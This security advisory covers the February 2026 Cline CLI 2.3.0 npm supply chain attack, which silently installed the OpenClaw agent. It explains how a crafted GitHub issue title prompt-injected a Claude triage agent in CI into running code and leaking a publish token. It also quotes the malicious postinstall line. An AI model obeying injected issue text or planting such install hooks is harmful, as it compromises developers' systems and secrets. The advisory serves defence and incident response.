Executive Summary

On February 17, 2026, a supply chain attack targeted the Cline CLI open-source package, resulting in the unauthorized installation of OpenClaw—an autonomous AI agent, on developer and CI/CD systems. The attack was executed by publishing a malicious version (cline@2.3.0) to the npm registry using a compromised publish token. This version included a post-install script that silently installed OpenClaw globally on affected machines. The incident window lasted approximately eight hours, during which the malicious package was downloaded around 4,000 times. No evidence of direct data exfiltration or additional malicious payloads was found; however, the installation of OpenClaw introduced significant risk due to its broad system-level permissions and persistent presence. The attack exploited a misconfiguration in the Cline GitHub Actions workflow, specifically through a prompt injection vulnerability that enabled the theft of publication credentials. The incident was mitigated by deprecating the compromised version, revoking the affected token, and releasing a clean update (cline@2.4.0). The overall impact is considered low, as OpenClaw itself is not inherently malicious, but the event highlights critical weaknesses in supply chain security and the governance of AI-powered automation in software development pipelines (The Hacker News, Endor Labs, StepSecurity).

Technical Information

The Cline CLI 2.3.0 supply chain attack represents a sophisticated compromise of the npm software ecosystem, leveraging both technical and procedural weaknesses in the package publication process. The attacker gained access to a long-lived npm publish token by exploiting a prompt injection vulnerability—codenamed "Clinejection"—in the Cline GitHub Actions workflow. This vulnerability allowed arbitrary code execution within the CI pipeline by manipulating the AI agent (Claude) responsible for triaging GitHub issues. The attacker poisoned the GitHub Actions cache and triggered the privileged nightly release workflow, ultimately stealing the npm publish token and using it to publish the malicious cline@2.3.0 package (The Hacker News).

The malicious package was published at 03:26 PT on February 17, 2026, and remained available until approximately 11:30 PT the same day. During this period, any system that installed or updated Cline CLI to version 2.3.0 automatically executed a post-install script embedded in the package's package.json file:

"scripts": { "postinstall": "npm install -g openclaw@latest" }

This script installed OpenClaw globally on the affected system without user consent or notification (StepSecurity). OpenClaw is an open-source AI agent framework designed to run locally with extensive system permissions, including terminal and disk access. It installs a persistent Gateway daemon (via launchd on macOS or systemd on Linux) that exposes a WebSocket server on ws://127.0.0.1:18789. The agent can access credentials and secrets stored in user directories, execute arbitrary shell commands via its operator API, and persist across system reboots.

A critical vulnerability in OpenClaw versions prior to 2026.1.29 (CVE-2026-25253, CVSS 8.8) allowed unauthenticated operator-level access through a crafted WebSocket handshake, further increasing the risk for affected systems (StepSecurity). Although OpenClaw itself is not classified as malware, its unauthorized installation and potential for privilege escalation and credential access present a significant security concern, especially in CI/CD environments where sensitive secrets may be exposed.

Technical analysis of the attack revealed several key indicators of compromise. The malicious cline@2.3.0 package deviated from the established trusted publishing pattern, being published manually by the user account "clinebotorg" rather than through the automated, provenance-backed GitHub Actions pipeline. The package also lacked npm provenance attestations, which are cryptographic proofs linking a published package to its source repository and build pipeline. These anomalies were detected by automated monitoring systems, prompting rapid response and deprecation of the compromised version (StepSecurity, Endor Labs).

The attack chain mapped to several MITRE ATT&CK techniques, including T1195.002 (Supply Chain Compromise), T1059.003 (Command and Scripting Interpreter), T1546.003 (Event Triggered Execution), T1547.001 (Boot or Logon Autostart Execution), T1552.001 (Unsecured Credentials), and T1071.001 (Application Layer Protocol: Web Protocols). The evidence supporting these mappings includes direct analysis of package metadata, workflow logs, and observed behavior of the installed OpenClaw agent.

No direct attribution to a specific threat actor has been made. The attack is consistent with opportunistic exploitation of misconfigurations and weak credential hygiene in open-source software pipelines. The use of prompt injection against an AI agent in a CI/CD workflow is a novel technique, marking a significant evolution in the threat landscape for software supply chain security (The Hacker News).

Affected Versions & Timeline

The only affected version of Cline CLI is 2.3.0, published to the npm registry at 03:26 PT on February 17, 2026. The malicious package was available for approximately eight hours, until it was deprecated at 11:30 PT the same day. During this window, the package was downloaded roughly 4,000 times, primarily by developers and CI/CD systems that did not pin their dependency versions (StepSecurity, Endor Labs).

The incident timeline is as follows:

At 03:26 PT (11:26 UTC) on February 17, 2026, the malicious cline@2.3.0 package was published to npm by the "clinebotorg" account. At 11:40 UTC, StepSecurity's artifact monitoring system flagged the anomalous release due to deviations from trusted publishing patterns and missing provenance. At 19:23 UTC, the maintainers released a clean version via the trusted pipeline and deprecated the malicious version. On February 18, 2026, the incident was publicly disclosed, with approximately 4,000 downloads recorded during the exposure window (StepSecurity).

The compromised package tarball and metadata remained available for some time after deprecation, but the npm publish token was revoked, and the npm publishing mechanism was updated to use OpenID Connect (OIDC) via GitHub Actions to prevent recurrence (The Hacker News).

The incident did not affect the Cline Visual Studio Code extension or JetBrains plugin. Only installations of the CLI tool via npm during the affected window were impacted (The Hacker News).

Threat Activity

The threat activity in this incident centered on the exploitation of a prompt injection vulnerability in the Cline GitHub Actions workflow. By crafting a malicious GitHub issue title, the attacker manipulated the AI agent (Claude) to execute arbitrary code within the triage workflow. This allowed the attacker to poison the GitHub Actions cache and trigger the privileged nightly release workflow, resulting in the theft of the npm publish token. With this token, the attacker published the malicious cline@2.3.0 package, embedding a post-install script to install OpenClaw globally on any system that installed or updated the package (The Hacker News).

OpenClaw itself is a legitimate open-source AI agent framework, but its unauthorized installation as a persistent, privileged daemon on developer and CI/CD systems created a significant risk. The agent's capabilities include access to credentials and secrets, arbitrary command execution, and persistence across reboots. A critical vulnerability (CVE-2026-25253) in older versions of OpenClaw further increased the risk by allowing unauthenticated operator-level access via its WebSocket API (StepSecurity).

The attack did not include additional malicious payloads or direct data exfiltration, and no evidence of further compromise has been reported. However, the event demonstrates the potential for significant impact when supply chain attacks target widely used developer tools and exploit weaknesses in automated CI/CD workflows (Endor Labs).

Mitigation & Workarounds

The following mitigation steps are recommended, prioritized by severity:

Critical: Immediately check all developer and CI/CD systems for the presence of cline@2.3.0. If this version is installed, update to cline@2.4.0 or later without delay (Endor Labs).

Critical: Remove OpenClaw if it was installed unintentionally by running npm uninstall -g openclaw. For systems where OpenClaw persists as a daemon, ensure the associated launchd or systemd service is stopped and disabled (StepSecurity).

High: For CI/CD environments, rotate any credentials, secrets, or tokens that may have been accessible to the affected build agents, especially if OpenClaw was installed and running during the exposure window. Review logs for unauthorized access or anomalous activity.

High: Audit all npm dependencies for provenance and trusted publishing attestations. Ensure that all package installations are version-pinned to prevent unintentional upgrades to compromised versions.

Medium: Review and harden CI/CD workflows to minimize permissions granted to automation agents, especially those powered by AI. Disable traditional token-based publishing in favor of OIDC-based trusted publishing mechanisms (Endor Labs).

Medium: Monitor for the presence of OpenClaw-related processes, files, and network activity (e.g., WebSocket server on ws://127.0.0.1:18789) on developer and build systems.

Low: Educate development and DevOps teams about the risks of supply chain attacks, prompt injection vulnerabilities, and the importance of provenance in open-source dependencies.

No further action is required for users of the Cline Visual Studio Code extension or JetBrains plugin, as these were not affected by the incident (The Hacker News).

References

https://thehackernews.com/2026/02/cline-cli-230-supply-chain-attack.html (Published: February 20, 2026)

https://www.endorlabs.com/learn/supply-chain-attack-targeting-cline-installs-openclaw (Published: February 18, 2026)

https://www.stepsecurity.io/blog/cline-supply-chain-attack-detected-cline-2-3-0-silently-installs-openclaw (Published: February 17, 2026)

About Rescana

Rescana provides a third-party risk management (TPRM) platform designed to help organizations identify, assess, and monitor supply chain risks in real time. Our platform enables continuous monitoring of open-source dependencies, automated detection of anomalous package releases, and assessment of CI/CD pipeline security posture. We support integration with major package registries and CI/CD platforms, providing actionable insights to mitigate risks from compromised credentials, misconfigurations, and unauthorized package publications. For questions or further assistance, contact us at ops@rescana.com.